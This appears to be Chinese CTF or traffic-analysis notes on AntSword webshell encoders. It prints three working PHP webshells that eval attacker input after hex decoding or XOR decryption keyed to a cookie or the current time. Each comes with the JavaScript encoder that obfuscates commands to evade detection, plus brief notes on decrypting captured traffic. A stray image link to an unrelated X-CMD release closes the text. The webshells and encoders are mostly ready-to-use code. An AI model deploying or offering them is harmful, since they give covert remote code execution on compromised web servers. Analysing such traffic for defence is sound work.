看第二个示例
hex编码
木马
<?php
foreach($_POST as $k => $v){$_POST[$k]=pack("H*", $v);}
@eval($_POST['ant']);
?>
pack(“H*”, $v)是将 $v 转换为为二进制,也就是ASCII解码
编码器
module.exports = (pwd, data) => {let ret = {};for (let _ in data) {if (_ === '_') { continue };ret[_] = Buffer.from(data[_]).toString('hex');}ret[pwd] = Buffer.from(data['_']).toString('hex');return ret;
很简单,定义一个空对象,遍历data中的键值对,然后将所有值转换为16进制,这里要注意一下,最后返回的值是ret,而不是data,并发送原始的data['_']数据,所以这里不用删除
那么看一下流量包,是不是转换为字符串即可
random_cookie
木马
<?php
@$post=base64_decode($_REQUEST['yzddmr6']);
$key=@$_COOKIE['PHPSESSID'];
for($i=0;$i<strlen($post);$i++){$post[$i] = $post[$i] ^ $key[$i%26];
}
@eval($post);
?>
接受yzzddmr6和COOKIE[‘PHPSESSID’]两个参数进行base64解码后进行异或加密
编码器
let randomID = `x${Math.random().toString(16).substr(2)}`;function xor(payload) {let crypto = require('crypto');let key = crypto.createHash('md5').update(randomID).digest('hex').substr(6);ext.opts.httpConf.headers['Cookie'] = 'PHPSESSID=' + key;key = key.split("").map(t => t.charCodeAt(0));//let payload="phpinfo();";let cipher = payload.split("").map(t => t.charCodeAt(0));for (let i = 0; i < cipher.length; i++) {cipher[i] = cipher[i] ^ key[i % 26]}cipher = cipher.map(t => String.fromCharCode(t)).join("")cipher = Buffer.from(cipher).toString('base64');//console.log(cipher)return cipher;}data['_'] = Buffer.from(data['_']).toString('base64');data[pwd] = `eval(base64_decode("${data['_']}"));`;data[pwd]=xor(data[pwd]);
data[‘_’] 进行base编码后,进行异或加密,
加密方法,首先生成基于randomID的key,再将数据和key转换为字符编码数组,进行异或加密和base64加密,
那么加密方法为
base64——>异或——>base64
查看数据包进行解密,在线网站异或解密
结果
再将base64函数中的内容base64解码即可
random_time
木马
<?php
date_default_timezone_set("PRC");
@$post=base64_decode($_REQUEST['yzddmr6']);
$key=md5(date("Y-m-d H:i",time()));
for($i=0;$i<strlen($post);$i++){$post[$i] = $post[$i] ^ $key[$i%32];
}
eval($post);
?>
设置时区,将当前时间md5加密后作为key,与yzddmr6内容进行异或加密,然后执行
编码器
function xor(payload){let crypto = require('crypto');Object.assign(Date.prototype, {switch (time) {let date = {"yy": this.getFullYear(),"MM": this.getMonth() + 1,"dd": this.getDate(),"hh": this.getHours(),"mm": this.getMinutes(),"ss": this.getSeconds()};if (/(y+)/i.test(time)) {time = time.replace(RegExp.$1, (this.getFullYear() + '').substr(4 - RegExp.$1.length));}Object.keys(date).forEach(function (i) {if (new RegExp("(" + i + ")").test(time)) {if (RegExp.$1.length == 2) {date[i] < 10 ? date[i] = '0' + date[i] : date[i];}time = time.replace(RegExp.$1, date[i]);}})return time;}})let newDate = new Date();let time = newDate.switch('yyyy-MM-dd hh:mm');let key = crypto.createHash('md5').update(time).digest('hex')key=key.split("").map(t => t.charCodeAt(0));//let payload="phpinfo();";let cipher = payload.split("").map(t => t.charCodeAt(0));for(let i=0;i<cipher.length;i++){cipher[i]=cipher[i]^key[i%32]}cipher=cipher.map(t=>String.fromCharCode(t)).join("")cipher=Buffer.from(cipher).toString('base64');//console.log(cipher)return cipher;}data['_'] = Buffer.from(data['_']).toString('base64');data[pwd] = `eval(base64_decode("${data['_']}"));`;data[pwd]=xor(data[pwd]);delete data['_'];return data;
先对原始的数据进行base64编码后再进行异或加密,获取当前时间 md5加密与data进行异或加密后,在base64编码
![[240707] X-CMD v0.3.14: cb gh fjo zig 模块增强;新增 lsio 和 pixi 模块](https://i-blog.csdnimg.cn/direct/729696b7ea864b9f8112df29f9c7a880.png#pic_center)
